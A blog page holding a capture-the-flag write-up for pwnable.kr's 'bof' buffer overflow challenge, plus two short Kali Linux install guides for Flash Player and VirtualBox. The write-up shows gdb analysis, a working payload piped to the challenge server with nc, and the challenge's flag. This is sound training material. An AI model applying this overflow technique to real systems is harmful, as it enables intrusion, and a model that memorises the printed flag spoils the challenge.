Friday, December 14, 2018

HOWTO : Solution of bof at Toddler's Bottle

Toddler's Bottle is one of the CTF games at pwnable.kr website. I am going to do the game is namely bof. There are already many writeups in the internet. However, I am going to explain what I learnt from this game.

Website : http://pwnable.kr/play.php (Select bof)
Source Code : http://pwnable.kr/bin/bof.c
Binary : http://pwnable.kr/bin/bof

Exploit Server : pwnable.kr:9000

The source code of the bof binary is provided. I examine the source code and found out that we are going to replace the "key" from "0xdeadbeef" to "0xcafebabe". The "overflowme" variable is 32 characters long. No matter what you entered in the "overflowme" variable, the "key" is not changed as it is hard coded. It is a buffer overflow challenge. However, we are not going to take control of the return address this time.



Load the gdb with PEDA and check with "checksec". It is confirmed that the NX is enabled with another restrictions.

gdb -q ./bof



Run "disass main" to disassemble the "main" function.

disass main



Run "disass func" to disassembe the "func" function.

disass func



In the "func" function, the following codes that I am interested in.

0x00000649 <+29>:    lea  eax,[ebp-0x2c]
0x0000064c <+32>:    mov  DWORD PTR [esp],eax
0x0000064f <+35>:    call 0x650
0x00000654 <+40>:    cmp  DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>:    jne  0x66b

The "eax,[ebp-0x2c]", "ebp-0x2c" may be contained the value of "overflowme" variable and saved in eax register.

The "DWORD PTR [ebp+0x8],0xcafebabe", "ebp+0x8" may be contained the value of "key", that is "0xdeadbeef".

I am going to set a breakpoint at "0x0000065b <+47>".

b *func+47



Then "r" run the program and is prompted for entering "helloworld" as the "overflowme".



After entering the "helloworld", I am going to examine the "eax" and "ebp+0x8".

x/x $ebp+0x8
x/s $eax




The result confirmed what I suspected. I am going to check the offset the two addresses with Python. The offset is 52.



Once get the offset, I am going to overwrite the "0xdeadbeef" with "0xcafebabe" with the exploit code. The "cat" command is for the interactive with the shell.

(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000



The flag is :

daddy, I just pwned a buFFer :)




That's all! See you.


Friday, December 07, 2018

HOWTO : Flash Player on Kali Linux 2018.4

Kali Linux 2018.4 does not come with latest version of Flash Player. Since Flash Player may be vulnerable, we need to keep it to be updated. However, most tutorials in the internet teach you copy the Flash Player object file (libflashplayer.so) to /usr/lib/mozilla/plugins/ only. It is very hard to keep track the latest update this way. The following method may be the best way to install Flash Player on Kali Linux 2018.4. It works for Firefox and Chrome as well as Chromium.

Step 1 :

apt update
apt install browser-plugin-freshplayer-pepperflash pepperflashplugin-nonfree


Step 2 :

Go to https://github.com/cybernova/fireflashupdate to download fireflashupdate.sh

wget https://raw.githubusercontent.com/cybernova/fireflashupdate/master/fireflashupdate.sh

chmod +x fireflashupdate.sh
./fireflashupdate.sh


Step 3 :

To update Flash Player :

./fireflashupdate.sh

Step 4 :

You may need to change the settings at Preferences menu of Firefox Add-ons - Plugins - Shockwave Flash from "Ask to Activate" to "Always Activate".

That's all! See you.


Thursday, December 06, 2018

HOWTO : Virtualbox 5.2.22 on Kali Linux 2018.4

The current version of Virtualbox for Kali Linux 2018.4 is the latest verion 5.2.22. Since the official version of Virtualbox cannot be installed on Kali Linux, the Kali version is to be installed. Luckily, it is the latest version.

apt update
apt install virtualbox-dkms virtualbox-ext-pack virtualbox-guest-additions-iso


That's all! See you.